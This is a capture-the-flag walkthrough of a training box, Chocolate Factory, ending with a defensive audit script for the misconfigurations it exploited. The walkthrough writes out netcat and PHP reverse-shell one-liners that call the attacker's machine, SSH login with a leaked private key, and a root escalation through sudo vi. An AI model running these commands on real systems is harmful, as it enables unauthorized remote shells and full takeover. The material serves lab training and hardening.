Welcome and let’s get started!
And the first thing is… enumerate!
Let’s run nmap:
nmap -p- <target-machine-ip>
Wow!! So many open ports!!
Let’s check what they are running and pull up nmap again. This time I’ll save the output to a file.
nmap -p 21,22,80,100-125 -T4 -A -oA chocolate-nmap <target-machine-ip>
Opening the report on our text editor, we can see a lot of… ASCII?
And this goes on until the end… except for port 113:
Well, there is some key somewhere on the web server. Let us take note of this and check the website.
Open the browser and enter the machine IP address:
We are presented with a login page but we do not know the credentials. I guess brute-forcing this would be an option, but I usually save that as a last resort.
Let’s check the source code of the page.
A simple POST form that sends the data to a PHP file called validate.php.
Continuing with the discovery phase, let’s enumerate the web server directories and files using Gobuster:
gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://<target-machine-IP> -t 50 -x php,txt,htm,html,cfg -s 200,301,304
Nice! Gobuster shows us 3 files. index.html and validate.php we already know, so let’s navigate to home.php.
I guess we can run commands from this page. Let’s try some.
www-data, as expected, I guess. Check the directory contents with ls.
It’s kind of hard to read, so let’s arrange this:
Remember what nmap found on port 113, referring to some key_rev_key file? There it is! But what kind of file is it?
It is a binary executable. We can, probably, get something out of it. Maybe later.
This interface is kinda clumsy, so let’s try to get a shell. First, check whether the system has netcat installed by running
Well, it has. Set up a listener on your box and launch a netcat reverse shell from the page.
nc -nvlp 65000
nc -n <your-machine-ip> 65000 -e /bin/bash
And nothing happens…
Since the web server runs PHP, it must have PHP installed…
Again, set up a listener on your box and launch the PHP one-liner reverse shell from the page.
nc -nvlp 65000
/usr/bin/php -r '$sock=fsockopen("<your-machine-ip>",65000);exec("/bin/sh -i <&3 >&3 2>&3");'
And we got shell!!
Let’s make it more usable:
python -c 'import pty;pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
Now we have a pretty little shell…
Check the files in this directory.
We can read most of those files. We already know that key_rev_key is an executable file but we do not have permissions to run it.
Take a peek at validate.php.
And we have “charlie” password for the web application!
If we enter those credentials on the login page, we are taken to… home.php. And it is just the same as if we had gone there directly.
OK, so let’s take a walk through the filesystem.
ls -al /home
We can try to change user to charlie using the same password… but it does not work.
We have permissions to check charlie’s home directory, so why not?
ls -al /home/charlie
Well, we cannot read the user flag, but we can check those teleport files.
Nice!! Public and private RSA keys that will allow us to ssh into the machine as charlie!
Copy the contents of the private key file, teleport, to a file on your machine. We can simply copy/paste from the previous cat command.
Then, on your machine, run the ssh client with the identity flag pointing to the file you just created.
ssh charlie@<target-machine-ip> -i teleport
And we are charlie! Let’s jump to charlie’s home dir, in /home/charlie and grab that user flag!
cd /home/charlie && cat user.txt
Now, we return to the web server public directory, located at /var/www/html and run key_rev_key.
Remember, this is a CTF. On a real pentesting job, DO NOT RUN UNKNOWN EXECUTABLES!
chmod +x key_rev_key && ./key_rev_key
The program asks for a name that we do not have, but it might be hardcoded in it. Let’s run strings on it.
It gives us a bunch of strings. Let’s focus on those we are more familiar with.
Although “laksdhfas” is weird, let’s feed it to the program.
Well done! We got a key!
Now, for the root!!
Run sudo to check what charlie can or cannot do without a password.
sudo vi -c ':!/bin/bash' /dev/null
Just grab that root flag, and we are done!
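Two of the findings that made this box fall, the private key in charlie’s home that any user could read and the NOPASSWD sudo rule for vi, are things a defender can audit for. The POSIX shell script below is an added example written for this write-up, not code from the original post or the room; the directory tree and sudoers line it inspects are constructed fixtures, and the function names are my own.

```sh
#!/bin/sh
# Added defensive audit, not part of the original write-up. Reports private
# keys that users other than the owner can read and sudoers NOPASSWD rules
# that grant vi/vim (an editor that can run shell commands).
set -u

# Print files under $1 that look like private keys and are group- or
# world-readable. Only the first line is inspected, so large files are cheap.
find_readable_private_keys() {
    find "$1" -type f \( -perm -040 -o -perm -004 \) 2>/dev/null |
    while IFS= read -r f; do
        if head -n 1 "$f" 2>/dev/null | grep -q -e '-----BEGIN .*PRIVATE KEY-----'; then
            printf '%s\n' "$f"
        fi
    done
}

# Print non-comment lines of sudoers file $1 that contain NOPASSWD and name
# vi or vim as the permitted command.
find_nopasswd_editor_rules() {
    grep -v '^[[:space:]]*#' "$1" 2>/dev/null |
    grep 'NOPASSWD' |
    grep -E '(^|[[:space:]/])vim?([[:space:]]|$)'
}

# --- constructed fixture: sample data modelled on the findings, not the box ---
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
mkdir -p "$demo_dir/home/charlie"
printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'EXAMPLE' \
    '-----END OPENSSH PRIVATE KEY-----' > "$demo_dir/home/charlie/teleport"
chmod 644 "$demo_dir/home/charlie/teleport"      # readable by everyone: the finding
printf '%s\n' 'secret' > "$demo_dir/home/charlie/user.txt"
chmod 600 "$demo_dir/home/charlie/user.txt"      # owner-only: must not be reported
printf '%s\n' '# comment' 'charlie ALL=(ALL) NOPASSWD: /usr/bin/vi' \
    'root ALL=(ALL:ALL) ALL' > "$demo_dir/sudoers"

find_readable_private_keys "$demo_dir/home"
find_nopasswd_editor_rules "$demo_dir/sudoers"
```

Point both functions at the real /home and /etc/sudoers (or /etc/sudoers.d/*) to run the same checks on a live host.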
Thanks for reading this write-up. Hope you enjoyed this Chocolate Factory!